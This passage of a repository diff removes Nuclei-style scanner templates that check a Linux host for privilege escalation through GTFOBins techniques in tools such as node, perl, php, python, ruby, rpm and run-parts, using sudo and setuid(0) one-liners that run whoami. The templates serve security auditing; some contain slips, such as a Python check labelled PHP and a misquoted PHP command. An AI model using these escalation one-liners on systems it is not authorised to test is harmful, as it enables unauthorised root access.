|
|
||||||
description: |
|
|
||||||
Node.js is a popular open-source, cross-platform JavaScript runtime environment that executes JavaScript code outside of a web browser. It is commonly used for building scalable network applications and is known for its event-driven, non-blocking I/O model. Node.js is widely used for server-side scripting and has a large ecosystem of libraries and frameworks.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/node/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,node,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
node -e 'process.setuid(0); require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
- 'contains(code_4_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100dcb589afe5b82d4c95a8a103942bdfa4ffdeca24be83816bda1013e2efdb0648022067f67aba51dd433b67493daa6970d379d08bf8c91351375fac26c6c2a54f0999:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-nsenter
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Nsenter - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
nsenter is a command-line utility in Linux that allows a user to enter into an existing namespace. It is commonly used for troubleshooting and managing namespaces in containerized environments. By using nsenter, users can enter into a specific namespace and execute commands within that namespace, which can be helpful for various system administration tasks.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/nsenter/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,nsenter,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
nsenter whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo nsenter whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100bcc2702e046210af31cecc2bc6d6f6f17d55deba9283429ecbaa37b2da7ad3d6022076555f0b6ddfef5630de6165278458fec5a6dfd9dbe33a25ccac7d35827df83f:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,55 +0,0 @@
|
||||||
id: privesc-perl
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Perl - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Perl is a high-level, general-purpose programming language known for its powerful text processing capabilities. It is often used for system administration, web development, and network programming. Perl's syntax and features make it well-suited for tasks such as parsing and manipulating text, making it a popular choice for various scripting and automation tasks.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/perl/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,perl,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
perl -e 'exec "whoami";'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo perl -e 'exec "whoami";'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
- 'contains(code_4_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402200a093cb0aa2ec75dfb33f02dc087b501b5f6187d60468a6c67db3cddffc095d30220078ba7495f4c1a33103ce617214ba05d89845fd6941672e576ab45a8a1cb89d8:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-pexec
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: pexec - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
The term "pexec" typically refers to the "privileged execution" of a command or program.
|
|
||||||
reference: |
|
|
||||||
https://gtfobins.github.io/gtfobins/pexec/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,pexec,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
pexec whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo pexec whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100c000c6aff21897526283edb9a61a091f4bf4f35f40ba88d17a5be43abca4078802200947b42987bab5740cbae7af869fa6f069e877273bd74f31eb6fc52700de08c0:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,55 +0,0 @@
|
||||||
id: privesc-php
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: PHP - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
PHP is a popular server-side scripting language that is widely used for web development. It is known for its ease of use, flexibility, and broad support for web frameworks and content management systems. PHP is commonly used to create dynamic web pages, process form data, manage sessions, and interact with databases.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/php/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,php,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
php -r 'system("whoami");'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo php -r 'system("whoami");'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
php -r "posix_setuid(0); system("whoami");"
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
- 'contains(code_4_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100a2811ec94d726526a0710b6e046ee5f70bc02c6157d3f5e8d01149b0355c021d022100c4be4f37e14acf2f6798474a6e96d2d4c9179e1bf72dddeb6def304c006d2839:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-posh
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: posh - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
"posh" typically refers to the "Policy-compliant Ordinary SHell," which is a restricted shell designed to provide a limited set of commands and features for users with restricted access. It is often used in environments where users require limited functionality and access to system resources.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/posh/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,posh,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
posh -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo posh -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402202ccc69f1fcf287f4fec214024209ac72716454f2cf716fdc0793cbca8c0d3929022078a753c35cd96d3bec81ce9d3701450bb0d3e91edc06bbb531b961e240965014:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,55 +0,0 @@
|
||||||
id: privesc-python
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: PHP - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Python is a high-level, general-purpose programming language known for its readability and simplicity. It is widely used for web development, scientific computing, artificial intelligence, and system automation. Python's versatility, extensive standard library, and large community make it a popular choice for a wide range of applications.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/python/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,php,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
python -c 'import os; os.system("whoami")'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo python -c 'import os; os.system("whoami")'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
python -c 'import os; os.setuid(0); os.system("whoami")'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
- 'contains(code_4_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100dd52f3cccbdc07d60cadac29decf11d1227996a161f41918275422c8076e5398022100bb97bda70a37f3f30a579fa0cc157826af2f11edd9bd7aab0da65e3dabfbba6c:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rake
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Rake - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Rake is a build automation tool written in Ruby. It is similar to Make, Ant, or MSBuild, but uses a Ruby syntax. Rake is often used for automating tasks in software development, such as building, testing, and deploying applications.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rake/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rake,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rake -p '`whoami 1>&0`'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rake -p '`whoami 1>&0`'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402200749958e9afd9829c1f67a0ccc3dc94d28bc49715a8335644e76b91eab470a0f02205f3c3d21b41c81dd7e52a8716b05f8e688af8afd0b203aff9e0d89850fe800e8:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rc
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: RC - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
the rc command is a shell command interpreter that is used to execute commands and scripts. It is commonly used for scripting and automation tasks, and it provides a set of built-in commands and features for interacting with the system.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rc/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rc,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rc -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rc -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100ddc05de2641a181def4a9885d521a3060f68cbffdd0bac50e77315bd7e454bdd022025d8281ce109511fd7daa67dc3d51337c4dc4086cf0e084656e9143fb87170e0:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rlwrap
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: rlwrap - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
rlwrap is a utility that provides readline functionality to commands that lack it, allowing for command-line editing and history capabilities. It is commonly used to enhance the user experience when working with command-line tools that do not have built-in readline support.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rlwrap/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rlwrap,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rlwrap whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rlwrap whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502200ca88583b60e012b980e0043f04126ac3b05a5583b20efda37538715a768ecb7022100f29a6760712b6791f1bb45ce5e7d6b1b5fc92f267e3ffc99497fb0eaa7dca258:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rpm
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: rpm - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
rpm stands for "Red Hat Package Manager." It is a command-line package management utility used in Red Hat-based Linux distributions to install, update, and manage software packages. rpm is also used to query package information, verify package integrity, and perform various administrative tasks related to software packages.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rpm/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rpm,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rpm --pipe 'whoami 0<&1'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rpm --pipe 'whoami 0<&1'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a004730450220528464c28b189da3511e6757b61dcb7f6fba8a90515f2b337edcdb7aee9f5d7d022100b4c40f9809265bb79ffc65b504aa4074521a1b1e5a50f3d7a1dd91530b8dfed7:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rpmdb
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: rpmdb - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
The rpmdb is the database used by the RPM Package Manager to store metadata about installed packages on a Linux system. It is used to track information about installed packages, including their files, dependencies, and other attributes. The rpmdb is a critical component of package management on RPM-based Linux distributions.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rpmdb/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rpmdb,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rpmdb --eval '%(whoami 1>&2)'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rpmdb --eval '%(whoami 1>&2)'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402205c6ed2d663dbda0003dc3b0315103fb62ce649fc9771b88d15e9003c0093f6c402207181b174440db32afaaecb0c106c6ecafcb7605d20272b86c7055b7c96988b08:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rpmverify
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: rpmverify - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
The rpmverify command is used to verify the integrity and authenticity of installed RPM packages on a Linux system. It checks the files in the installed packages against the information stored in the RPM database to detect any modifications or discrepancies. This helps ensure the security and stability of the system by identifying any unauthorized changes to the installed packages.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rpmverify/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rpmverify,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rpmverify --eval '%(whoami 1>&2)'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rpmverify --eval '%(whoami 1>&2)'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a004730450220749059b8ec0e7d457d03ced81b4b48b3d69580b77a6e0c1198dcd2534727d4ed022100eb51a489cfa87f8689a639d6b921964d9e4a0b2b8e6aee5869361c52f4c71796:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,55 +0,0 @@
|
||||||
id: privesc-ruby
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Ruby - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/ruby/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,ruby,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
ruby -e 'exec "whoami"'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo ruby -e 'exec "whoami"'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
ruby -e 'Process::Sys.setuid(0); exec "whoami"'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
- 'contains(code_4_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502200d04ad6da824e3e4f8d827df453f11e89847545580da1379ad50187f92ce04fd022100889cc924bcb70907e887d989a704b2619b0fe0c144d7977a67fa607bcaf34645:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,47 +0,0 @@
|
||||||
id: privesc-run-parts
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: run-parts - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
|
|
||||||
reference: https://gtfobins.github.io/gtfobins/run-parts/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,run-parts,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
run-parts --new-session --regex 'whoami' /bin
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo run-parts --new-session --regex 'whoami' /bin
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502205d85cde00b6bfc479c2841da6603a84f6f418b3ef381bdc29990827138c2908c022100a9c341fc7f3a062b19e258bb7e86b1450073d7c9a907a50ef8794594c1af4374:922c64590222798bb761d5b6d8e72950
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue